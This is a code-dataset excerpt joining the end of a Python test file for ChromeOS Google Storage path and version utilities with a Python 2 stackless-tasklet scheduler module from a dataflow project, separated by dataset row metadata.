def testBuildValuesFromUri(self):
"""Tests BuildValuesFromUri"""
exp = (r'^gs://(?P<bucket>.*)/(?P<channel>.*)/(?P<board>.*)/'
r'(?P<version>.*)/chromeos_(?P<image_version>[^_]+)_'
r'(?P=board)_(?P<image_type>[^_]+)_(?P<image_channel>[^_]+)_'
'(?P<key>[^_]+).bin$')
uri = ('gs://chromeos-releases/dev-channel/link/4537.7.0/'
'chromeos_4537.7.1_link_recovery_nplusone-channel_mp-v4.bin')
values = gspaths.Build.BuildValuesFromUri(exp, uri)
self.assertEqual(values, {'build': gspaths.Build(bucket='chromeos-releases',
version='4537.7.0',
board='link',
channel='dev-channel'),
'image_version': '4537.7.1',
'image_type': 'recovery',
'image_channel': 'nplusone-channel',
'key': 'mp-v4'})
uri = 'foo-uri'
self.assertIsNone(gspaths.Build.BuildValuesFromUri(exp, uri))
class GsPathsTest(cros_test_lib.TestCase):
"""Test general gspaths utilities."""
def testVersionKey(self):
"""Test VersionKey, especially for new-style versus old-style."""
values = ['1.2.3', '1.2.2', '2.0.0', '1.1.4',
'1.2.3.4', '1.2.3.3', '1.2.4.4', '1.2.4.5', '1.3.3.4',
'0.1.2.3', '0.14.45.32']
sorted_values = sorted(values, key=gspaths.VersionKey)
reverse_sorted_values = sorted(reversed(values), key=gspaths.VersionKey)
expected_values = ['0.1.2.3', '0.14.45.32',
'1.2.3.3', '1.2.3.4', '1.2.4.4', '1.2.4.5', '1.3.3.4',
'1.1.4', '1.2.2', '1.2.3', '2.0.0']
self.assertEqual(sorted_values, expected_values)
self.assertEqual(reverse_sorted_values, expected_values)
def testVersionGreater(self):
"""Test VersionGreater, especially for new-style versus old-style."""
self.assertTrue(gspaths.VersionGreater('1.2.3', '1.2.2'))
self.assertTrue(gspaths.VersionGreater('1.2.3', '1.1.4'))
self.assertTrue(gspaths.VersionGreater('2.0.0', '1.2.3'))
self.assertFalse(gspaths.VersionGreater('1.2.3', '1.2.3'))
self.assertFalse(gspaths.VersionGreater('1.2.2', '1.2.3'))
self.assertFalse(gspaths.VersionGreater('1.1.4', '1.2.3'))
self.assertFalse(gspaths.VersionGreater('1.2.3', '2.0.0'))
self.assertTrue(gspaths.VersionGreater('1.2.3.4', '1.2.3.3'))
self.assertTrue(gspaths.VersionGreater('1.2.4.4', '1.2.3.4'))
self.assertTrue(gspaths.VersionGreater('1.3.3.4', '1.2.4.5'))
self.assertTrue(gspaths.VersionGreater('2.0.0.0', '1.2.3.4'))
self.assertFalse(gspaths.VersionGreater('1.2.3.4', '1.2.3.4'))
self.assertFalse(gspaths.VersionGreater('1.2.3.3', '1.2.3.4'))
self.assertFalse(gspaths.VersionGreater('1.2.3.4', '1.2.4.4'))
self.assertFalse(gspaths.VersionGreater('1.2.4.5', '1.3.3.4'))
self.assertFalse(gspaths.VersionGreater('1.2.3.4', '2.0.0.0'))
self.assertTrue(gspaths.VersionGreater('1.2.3', '1.2.3.4'))
self.assertTrue(gspaths.VersionGreater('1.2.3', '0.1.2.3'))
self.assertFalse(gspaths.VersionGreater('1.2.3.4', '1.2.3'))
self.assertFalse(gspaths.VersionGreater('0.1.2.3', '1.2.3'))
def testIsImage(self):
a = float(3.14)
self.assertFalse(gspaths.IsImage(a))
b = gspaths.Image()
self.assertTrue(gspaths.IsImage(b))
def testIsUnsignedImageArchive(self):
a = float(3.14)
self.assertFalse(gspaths.IsUnsignedImageArchive(a))
b = gspaths.UnsignedImageArchive()
self.assertTrue(gspaths.IsUnsignedImageArchive(b))
class ImageTest(cros_test_lib.TestCase):
"""Test Image class implementation."""
def setUp(self):
self.build = gspaths.Build(bucket='crt', channel='foo-channel',
board='board-name', version='1.2.3')
def testImage_DefaultImageType(self):
default_image = gspaths.Image(build=self.build)
self.assertEqual('recovery', default_image.image_type)
def testImage_CustomImageType(self):
custom_image_type = 'base'
custom_image = gspaths.Image(build=self.build, image_type=custom_image_type)
self.assertEqual(custom_image_type, custom_image.image_type)
| bsd-3-clause | 1,389,626,597,013,450,800 | 39.895623 | 80 | 0.591223 | false | 3.659536 | true | false | false |
rasata/pypes | core/pypes/scheduler.py | 4 | 2416 | """Provides scheduling routines for stackless tasklets.
The scheduler itself runs as a tasklet. It blocks waiting
for input on the channel passed in. When new data is sent
on this channel, the scheduler wakes and begins processing
of the data.
"""
import stackless
from pype import Pype
from graph import get_pairlist, topsort
import sys
import traceback
def sched(ch, graph):
"""Sits in an infinite loop waiting on the channel to recieve data.
The procedure prolog takes care of sorting the
input graph into a dependency list and initializing
the filter tasklets used to construct the graph.
@param graph: The graph representing the work flow
@type graph: Python dict organized as a graph struct
@param ch: The stackless channel to listen on
@type ch: stackless.channel
@return: nothing
"""
edgeList = get_pairlist(graph)
nodes = topsort(edgeList)
tasks = []
inputEdge = Pype()
for n in nodes:
# start this microthread
tasks.append(stackless.tasklet(n.run)())
try:
# get this nodes outputs
edges = graph[n]
except:
pass
else:
# for each output
for e in edges:
e1 = Pype()
# does this port exist
if not n.has_port(edges[e][0]):
print 'Trying to connect undefined output port', n, edges[e][0]
sys.exit(1)
n.connect_output(edges[e][0], e1)
# does this port exist
if not e.has_port(edges[e][1]):
print 'Trying to connect undefined input port', e, edges[e][1]
sys.exit(1)
e.connect_input(edges[e][1], e1)
# Added so that incoming data is fed to every input adapter
# should check if in exists and create it if it doesn't
# because a user could remove the input port by accident
inputEdges = []
for n in nodes:
if n.get_type() == 'ADAPTER':
ie = Pype()
n.connect_input('in', ie)
inputEdges.append(ie)
#nodes[0].connect_input('in', inputEdge)
while True:
data = ch.receive()
for ie in inputEdges:
ie.send(data)
#inputEdge.send(data)
try:
tasks[0].run()
except:
traceback.print_exc()
| apache-2.0 | 6,316,725,766,573,957,000 | 29.2 | 83 | 0.580298 | false | 4.144082 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.